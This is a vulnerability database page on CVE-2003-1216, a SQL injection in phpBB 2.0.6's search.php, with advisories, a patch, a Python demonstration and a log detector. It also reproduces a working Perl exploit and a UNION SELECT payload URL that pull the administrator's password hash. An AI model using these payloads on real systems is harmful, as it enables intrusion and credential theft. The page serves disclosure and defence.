CVE-2003-1216
CVSS7.5
Published: 2003-11-27 00:00:00
Revised: 2016-10-17 22:39:34
NMCOES    

[Original] SQL injection vulnerability in search.php for phpBB 2.0.6 and earlier allows remote attackers to execute arbitrary SQL and gain privileges via the search_id parameter.


[CNNVD] phpBB search.php Remote SQL Injection Vulnerability (CNNVD-200311-093)

phpBB2 is a web forum application written in PHP. It supports several database systems and runs on a variety of Unix and Linux operating systems.
The search.php script shipped with phpBB2 does not sufficiently filter user-supplied parameters; a remote attacker can exploit this to perform SQL injection and obtain sensitive system information.
Specifically, search.php does not adequately filter the "search_id" parameter. An attacker can submit malicious SQL in this parameter, altering the logic of the original SQL statement to read or modify database contents. Testing showed that the vulnerability can be used to obtain the administrator's password hash and, by modifying cookie data, access the system with administrator privileges.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:1.4.4
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:1.2.1
cpe:/a:phpbb_group:phpbb:1.4.0
cpe:/a:phpbb_group:phpbb:1.4.1
cpe:/a:phpbb_group:phpbb:2.0_beta1
cpe:/a:phpbb_group:phpbb:1.4.2
cpe:/a:phpbb_group:phpbb:1.0.0
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:1.2.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1216
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1216
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-093
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106997132425576&w=2
(UNKNOWN)  BUGTRAQ  20031127 phpBB 2.06 search.php SQL injection
http://marc.info/?l=bugtraq&m=107005608726609&w=2
(UNKNOWN)  BUGTRAQ  20031128 [Hat-Squad] phpBB search_id injection exploit
http://marc.info/?l=bugtraq&m=107196735102970&w=2
(UNKNOWN)  BUGTRAQ  20031220 phpBB v2.06 search_id sql injection exploit
http://www.phpbb.com/phpBB/viewtopic.php?t=153818
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=153818
http://www.securityfocus.com/bid/9122
(VENDOR_ADVISORY)  BID  9122
http://xforce.iss.net/xforce/xfdb/13867
(VENDOR_ADVISORY)  XF  phpbb-searchphp-sql-injection(13867)

- Vulnerability information

phpBB search.php Remote SQL Injection Vulnerability
High  Input validation
2003-11-27 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
* Open the search.php script and locate the following code:

    // Vulnerable: intval() is only used for the test; the raw string
    // $search_id is still interpolated into the query below.
    if ( intval($search_id) )
    {
        $sql = "SELECT search_array
            FROM " . SEARCH_TABLE . "
            WHERE search_id = $search_id
            AND session_id = '". $userdata['session_id'] . "'";

and replace it with the following code:

    // Fixed: cast first, so only the integer value reaches the query.
    $search_id = intval($search_id);
    if ( $search_id )
    {
        $sql = "SELECT search_array
            FROM " . SEARCH_TABLE . "
            WHERE search_id = $search_id
            AND session_id = '". $userdata['session_id'] . "'";

Vendor patch:
phpBB Group
-----------
Download the latest 2.06 version:

http://www.phpbb.com
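To show why the one-line change above matters, here is an added example (not phpBB's code and not part of the advisory) that models both query builders in Python and runs them against an in-memory SQLite database. The schema, session id, rows and the placeholder password hash are constructed; the table and column names follow phpBB's. The `php_intval` helper is an assumption that approximates PHP's `intval()` on strings.

```python
# Added example (not phpBB's code): modelling the vulnerable check and the
# vendor workaround from the advisory above, then running both query builders
# against an in-memory SQLite database with constructed rows.
import re
import sqlite3

SESSION_ID = "deadbeef"  # constructed phpBB session id

# A search_id value of the shape used in the published proof of concept
# (table/column names are phpBB's; the payload is shortened here).
PAYLOAD = "1 union select user_password from phpbb_users where user_id=2/*"


def php_intval(value: str) -> int:
    """Approximate PHP intval() on a string: leading whitespace, optional
    sign and digits are converted; anything else yields 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def build_query_vulnerable(search_id: str, session_id: str):
    """Pre-fix search.php logic: intval() guards the branch, but the raw
    string is interpolated into the SQL text."""
    if php_intval(search_id):
        return ("SELECT search_array FROM phpbb_search_results "
                f"WHERE search_id = {search_id} "
                f"AND session_id = '{session_id}'")
    return None


def build_query_fixed(search_id: str, session_id: str):
    """Vendor workaround: overwrite the variable with the integer first, so
    only digits ever reach the query."""
    search_id_int = php_intval(search_id)
    if search_id_int:
        return ("SELECT search_array FROM phpbb_search_results "
                f"WHERE search_id = {search_id_int} "
                f"AND session_id = '{session_id}'")
    return None


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows: one stored search and one user row with
    a placeholder (not real) password hash."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE phpbb_search_results (
            search_id INTEGER, session_id TEXT, search_array TEXT);
        CREATE TABLE phpbb_users (
            user_id INTEGER, username TEXT, user_password TEXT);
        INSERT INTO phpbb_search_results VALUES (1, 'deadbeef', 'a:0:{}');
        INSERT INTO phpbb_users VALUES (2, 'admin', 'PLACEHOLDER_HASH');
    """)
    return conn


def run(builder, search_id: str) -> list:
    """Build the query with the given builder and return the first column of
    every row the database hands back."""
    sql = builder(search_id, SESSION_ID)
    if sql is None:
        return []
    conn = make_db()
    try:
        return [row[0] for row in conn.execute(sql).fetchall()]
    except sqlite3.Error:
        return []
    finally:
        conn.close()


if __name__ == "__main__":
    print("vulnerable:", run(build_query_vulnerable, PAYLOAD))
    print("fixed:     ", run(build_query_fixed, PAYLOAD))
```

With the vulnerable builder the `UNION` in the payload survives into the statement and a row from `phpbb_users` comes back alongside the stored search; with the fixed builder the same input collapses to `search_id = 1`. The cast is sufficient here only because the column is an integer; for string parameters the general mitigation is a parameterized query rather than interpolation.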

- Vulnerability information (137)

phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit (EDBID:137)
php webapps
2003-12-21 Verified
0 RusH
N/A
#!/usr/bin/perl -w
use IO::Socket;
##    PROOF-OF-CONCEPT
##    * work only with mysql ver > 4.0
##    * work only with post #1 
##
##    Example:
##    C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
##    [~] prepare to connect...
##    [+] connected
##    [~] prepare to send data...
##    [+] OK
##    [~] wait for response...
##    [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT request...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat
(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,
116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,
97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,
105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,
59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,
58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,
104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/*
HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&amp/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o


# milw0rm.com [2003-12-21]
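The proof-of-concept above sends its payload in the `search_id` query parameter of a plain GET request, so it is visible in ordinary web server access logs. The following is an added example, not part of the exploit-db entry or of phpBB, of a small detector that flags requests to search.php whose `search_id` is not a plain integer. The log lines, client addresses and the shortened payload are constructed sample data; the regular expressions and severity grading are assumptions of this example.

```python
# Added example (not from the page or phpBB): scan access-log lines for
# search.php requests whose search_id is not a plain integer, the shape of
# the proof-of-concept requests above. All sample data below is constructed.
import re
from urllib.parse import parse_qs, urlsplit

# Fields of an Apache/nginx "combined" log line that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Tokens seen in the published payload shape; used only to grade severity.
SQL_TOKENS = re.compile(r"\b(union|select|concat|char)\b|/\*", re.IGNORECASE)

SAMPLE_LOG = [  # constructed log lines (RFC 5737 documentation addresses)
    '192.0.2.10 - - [27/Nov/2003:10:15:01 +0000] "GET /phpBB2/search.php?search_id=4711 HTTP/1.1" 200 8123',
    '192.0.2.10 - - [27/Nov/2003:10:15:05 +0000] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Nov/2003:10:16:40 +0000] "GET /phpBB2/search.php?search_id=1%20union%20select%20concat(char(97,58,55),user_password,char(125))%20from%20phpbb_users%20where%20user_id=2/* HTTP/1.0" 200 2048',
    '203.0.113.5 - - [27/Nov/2003:10:17:02 +0000] "GET /phpBB2/search.php?search_id=1abc HTTP/1.1" 200 512',
    'garbage line that does not parse',
]


def parse_line(line: str):
    """Split one combined-format line into named fields, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_search_request(target: str):
    """Return a finding for a search.php request whose search_id is not
    purely numeric, else None. parse_qs percent-decodes the value."""
    url = urlsplit(target)
    if not url.path.endswith("/search.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("search_id", []):
        if re.fullmatch(r"\d+", value):
            continue  # what the fixed intval() path would accept unchanged
        severity = "high" if SQL_TOKENS.search(value) else "medium"
        return {"severity": severity, "search_id": value[:60]}
    return None


def scan(lines):
    """Run the check over every parseable line; unparseable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        finding = check_search_request(rec["target"])
        if finding:
            finding.update(ip=rec["ip"], ts=rec["ts"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["ts"], repr(f["search_id"]))
```

Because the vendor fix reduces `search_id` to an integer, "anything that is not all digits" is a precise rule for this parameter rather than a keyword blacklist; the SQL token match only ranks the hits. A non-numeric value with no SQL tokens (the `1abc` line) still surfaces as a lower-severity finding.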
		

- Vulnerability information

2875
phpBB search.php search_id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

phpBB 2.0.6 and prior contains a flaw that allows an attacker to manipulate SQL queries and potentially gain administrative control over the forum. The "search.php" script of the application does not sufficiently sanitize the input of the "search_id" parameter. This can be exploited to gain information such as password hashes and more.

- Timeline

2003-11-27 Unknown
2003-11-27 Unknown

- Solution

Upgrade to version 2.06 or higher, available from the vendor site, as it has been reported to fix this vulnerability. Note that the issue was fixed without incrementing the version number. The flaw can also be corrected by applying the workaround provided by the vendor.

- References

- Vulnerability author

- Vulnerability information

phpBB search.php SQL Injection Vulnerability
Input Validation Error 9122
Yes No
2003-11-27 12:00:00 2009-07-12 12:56:00
The disclosure of this issue has been credited to Niels Teusink <n.teusink@planet.nl>. Exploit code has been supplied by RusH security team <www.rsteam.ru>. This issue is also reported to have been independently discovered by rick patel <rikul7@yahoo.com>.

- Affected program versions

phpBB Group phpBB 2.0.6

- Vulnerability discussion

It has been reported that phpBB may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database.

phpBB version 2.06 has been prone to this issue, however other versions may be affected as well.

- Exploit

The following proof of concept has been supplied by Hat-Squad Security Team:

http://www.example.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58
,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,9
7,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58
,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111
,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enter uid]/*

The following exploit has been provided:

- Solution

It has been reported that the vendor has patched version 2.06. Users are advised to download the fixed 2.06 version of the software.

- References

 

 
